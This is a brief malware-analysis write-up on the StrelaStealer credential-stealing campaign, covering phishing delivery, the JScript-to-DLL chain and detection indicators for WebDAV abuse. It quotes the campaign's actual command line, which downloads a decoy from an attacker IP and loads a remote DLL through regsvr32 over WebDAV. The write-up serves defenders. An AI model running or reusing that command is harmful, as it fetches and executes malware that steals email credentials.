StrelaStealer - A Credential-Stealing Malware Campaign

This campaign targets various industries, including technology, finance, legal services, manufacturing, government, energy, insurance, and construction sectors. It starts with phishing emails with attachments to deliver its payload. The emails often masquerade as invoices or other legitimate documents. The payload is a DLL file that steals email login credentials and sends them to a threat actor-controlled server

The malware is distributed via large-scale spam campaigns. The attachments are usually ZIP files containing a JScript file. Once the ZIP file is opened, the JScript file drops a Base64-encoded file and a batch file. The encoded file is decoded to create a PE DLL, which is executed using rundll32.exe. The latest version of StrelaStealer uses advanced obfuscation techniques, including an updated packer and control flow obfuscation, to evade detection

The primary goal is to steal email login credentials, which can be used for follow-up attacks. Furthermore, the threat actors behind StrelaStealer continuously update their techniques to avoid detection and maintain persistence

The JS file executes the following script: cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.pdf hxxp://193.143.1.205/invoice.php" && start %temp%\invoice.pdf && cmd /c net use \193.143.1.205@8888\davwwwroot\ && cmd /c regsvr32 /s \193.143.1.205@8888\davwwwroot\281681957614368.dll

The threat actors abuse PowerShell not for malware downloading but to download and save a decoy document. The most interesting aspect is their use of WebDAV. Here are the key indicators to watch for: Execution of the net use command with "davwwwroot" in the command line. Execution of regsvr32 or rundll32 with "davwwwroot" in the command line.

Referencet

For IOCs Resource